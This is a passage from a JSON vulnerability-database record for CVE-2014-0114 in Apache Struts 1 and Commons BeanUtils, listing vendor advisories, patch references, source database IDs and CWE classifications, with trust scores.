"url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014verbose-1972962.html"
},
{
"title": "Oracle Critical Patch Update Advisory - October 2014",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html"
},
{
"title": "Oracle Critical Patch Update Advisory - January 2015",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"
},
{
"title": "Text Form of Oracle Critical Patch Update - January 2015 Risk Matrices",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2015verbose-1972976.html"
},
{
"title": "Oracle Critical Patch Update Advisory - July 2014",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html"
},
{
"title": "Text Form of Oracle Critical Patch Update - July 2014 Risk Matrices",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpujul2014verbose-1972958.html"
},
{
"title": "Does CVE-2014-0114 affect Struts 1 in Red Hat products?",
"trust": 0.8,
"url": "https://access.redhat.com/solutions/869353"
},
{
"title": "Bug 1116665",
"trust": 0.8,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1116665"
},
{
"title": "Bug 1091938",
"trust": 0.8,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1091938"
},
{
"title": "July 2014 Critical Patch Update Released",
"trust": 0.8,
"url": "https://blogs.oracle.com/security/entry/july_2014_critical_patch_update"
},
{
"title": "October 2014 Critical Patch Update Released",
"trust": 0.8,
"url": "https://blogs.oracle.com/security/entry/october_2014_critical_patch_update"
},
{
"title": "January 2015 Critical Patch Update Released",
"trust": 0.8,
"url": "https://blogs.oracle.com/security/entry/january_2015_critical_patch_update"
},
{
"title": "TERASOLUNA Framework",
"trust": 0.8,
"url": "http://en.sourceforge.jp/projects/terasoluna/"
},
{
"title": "Apache Struts 1.2.9 with SP1 by NTT DATA",
"trust": 0.8,
"url": "http://en.sourceforge.jp/projects/terasoluna/wiki/StrutsPatch1-EN"
},
{
"title": "struts-1.2.9-4jpp.8.el5_10.src",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=49743"
},
{
"title": "Red Hat: Important: Red Hat A-MQ Broker 7.5 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20192995 - Security Advisory"
},
{
"title": "Debian CVElist Bug Report Logs: libstruts1.2-java: CVE-2014-0114",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=96f4091aa31a0ece729fdcb110066df5"
},
{
"title": "Red Hat: CVE-2014-0114",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2014-0114"
},
{
"title": "Red Hat: Important: Fuse 7.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20182669 - Security Advisory"
},
{
"title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been fixed in IBM Security Privileged Identity Manager Appliance.",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=f5bb2b180c7c77e5a02747a1f31830d9"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - January 2019",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=f655264a6935505d167bbf45f409a57b"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - October 2018",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=81c63752a6f26433af2128b2e8c02385"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - January 2018",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d"
},
{
"title": "IBM: IBM Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to multiple security vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=55ea315dfb69fce8383762ac64250315"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - April 2017",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - October 2017",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a"
},
{
"title": "IBM: Security Bulletin: Netcool Operations Insight v1.6.6 contains fixes for multiple security vulnerabilities.",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=68c6989b84f14aaac220c13b754c7702"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - January 2015",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4a692d6d60aa31507cb101702b494c51"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - October 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - July 2018",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=5f8c525f1408011628af1792207b2099"
},
{
"title": "struts1-patch",
"trust": 0.1,
"url": "https://github.com/ricedu/struts1-patch "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/weblegacy/struts1 "
},
{
"title": "struts1filter",
"trust": 0.1,
"url": "https://github.com/rgielen/struts1filter "
},
{
"title": "StrutsExample",
"trust": 0.1,
"url": "https://github.com/vikasvns2000/StrutsExample "
},
{
"title": "struts-mini",
"trust": 0.1,
"url": "https://github.com/bingcai/struts-mini "
},
{
"title": "strutt-cve-2014-0114",
"trust": 0.1,
"url": "https://github.com/anob3it/strutt-cve-2014-0114 "
},
{
"title": "super-pom",
"trust": 0.1,
"url": "https://github.com/ian4hu/super-pom "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0114"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006468"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-20",
"trust": 1.0
},
{
"problemtype": "Use of unmaintained third-party components (CWE-1104) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Path traversal (CWE-22) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Execution with unnecessary privileges (CWE-250) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Inappropriate authorization (CWE-285) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Improper authentication (CWE-287) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Authentication bypass using alternate path or channel (CWE-288) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Inappropriate restriction of excessive authentication attempts (CWE-307) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Unlimited upload of dangerous types of files (CWE-434) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Inadequate protection of credentials (CWE-522) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Cross-site scripting (CWE-79) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Lack of certification (CWE-862) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Private features (CWE-912) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": "CWE-DesignError",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-006468"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056"
},
{
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.8,
"url": "http://www.securityfocus.com/bid/67121"
},
{
"trust": 2.5,
"url": "http://www.vmware.com/security/advisories/vmsa-2014-0008.html"
},
{
"trust": 2.2,
"url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html"
},
{
"trust": 2.2,
"url": "http://www.debian.org/security/2014/dsa-2940"
},
{
"trust": 2.2,
"url": "http://www.ibm.com/support/docview.wss?uid=swg21675496"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042296"
},
{
"trust": 1.9,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
},
{
"trust": 1.9,
"url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
},
{
"trust": 1.9,
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"
},
{
"trust": 1.9,
"url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html"
},
{
"trust": 1.9,
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
"trust": 1.9,
"url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html"
},
{
"trust": 1.9,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676303"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675266"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676110"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677110"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675689"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674812"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674128"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675972"
},
{
"trust": 1.7,
"url": "http://jvn.jp/en/jp/jvn30962312/index.html"
},
{
"trust": 1.7,
"url": "http://advisories.mageia.org/mgasa-2014-0219.html"
},
{
"trust": 1.7,
"url": "https://security.gentoo.org/glsa/201607-09"
},
{
"trust": 1.7,
"url": "https://access.redhat.com/errata/rhsa-2019:2995"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b%40%3cannounce.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://openwall.com/lists/oss-security/2014/06/15/10"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd%40%3ccommits.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://issues.apache.org/jira/browse/beanutils-463"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/57477"
},
{
"trust": 1.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675898"
},
{
"trust": 1.6,
"url": "http://openwall.com/lists/oss-security/2014/07/08/1"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1%40%3cdev.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://security.netapp.com/advisory/ntap-20140911-0001/"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639%40%3ccommits.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59430"
},
{
"trust": 1.6,
"url": "http://seclists.org/fulldisclosure/2014/dec/23"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/58851"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3%40%3cnotifications.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59704"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40%40%3cgitbox.activemq.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3cdev.drill.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59480"
},
{
"trust": 1.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676091"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f%40%3cuser.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59246"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59245"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59479"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59118"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://apache-ignite-developers.2346864.n4.nabble.com/cve-2014-0114-apache-ignite-is-vulnerable-to-existing-cve-2014-0114-td31205.html"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/58947"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25%40%3cdev.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477%40%3ccommits.dolphinscheduler.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1091938"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3cissues.drill.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136958.html"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59014"
},
{
"trust": 1.6,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1116665"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/58710"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5%40%3ccommits.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675387"
},
{
"trust": 1.6,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
},
{
"trust": 1.6,
"url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3cdev.drill.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/release-notes.txt"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59464"
},
{
"trust": 1.6,
"url": "https://access.redhat.com/errata/rhsa-2018:2669"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86%40%3cdev.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05324755"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=140119284401582\u0026w=2"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=141451023707502\u0026w=2"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59228"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3%40%3cdevnull.infra.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676931"
},
{
"trust": 1.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676375"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/60177"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:095"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859%40%3cdev.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/60703"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f%40%3cnotifications.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59718"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3ccommits.druid.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c%40%3ccommits.pulsar.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=140801096002766\u0026w=2"
},
{
"trust": 1.6,
"url": "https://security.netapp.com/advisory/ntap-20180629-0006/"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://access.redhat.com/solutions/869353"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.2,
"url": "https://rhn.redhat.com/errata/rhsa-2014-0497.html"
},
{
"trust": 0.9,
"url": "http://www.liferay.com/community/security-team/known-vulnerabilities/-/asset_publisher/t8ei/content/cst-sa-lps-46552-struts-1-classloader-manipulation"
},
{
"trust": 0.9,
"url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10643\u0026cat=sirt_1\u0026actp=list"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674435"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674428"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674937"
},
{
"trust": 0.9,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04311273"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675822"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673663"
},
{
"trust": 0.9,
"url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-018/index.html"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21672316"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676375"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673098"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673944"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673101"
},
{
"trust": 0.9,
"url": "https://rhn.redhat.com/errata/rhsa-2014-0498.html"
},
{
"trust": 0.9,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04399728"
},
{
"trust": 0.9,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04473828"
},
{
"trust": 0.9,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05324755"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61061"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21680848"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676646"
},
{
"trust": 0.9,
"url": "http://struts.apache.org/release/2.3.x/docs/s2-021.html"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042186"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042185"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042184"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61039"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61058"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037507"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678830"
},
{
"trust": 0.9,
"url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-020/index.html"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037825"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037409"
},
{
"trust": 0.9,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037506"
},
{
"trust": 0.9,
"url": "https://rhn.redhat.com/errata/rhsa-2014-0500.html"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004807"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673757"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673508"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673695"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674099"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674104"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673992"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674110"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673982"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673422"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678359"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680716"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21675387"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677802"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674310"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674191"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674017"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674016"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674339"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677449"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675496"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676485"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677298"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674613"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676091"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673878"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673877"
},
{
"trust": 0.9,
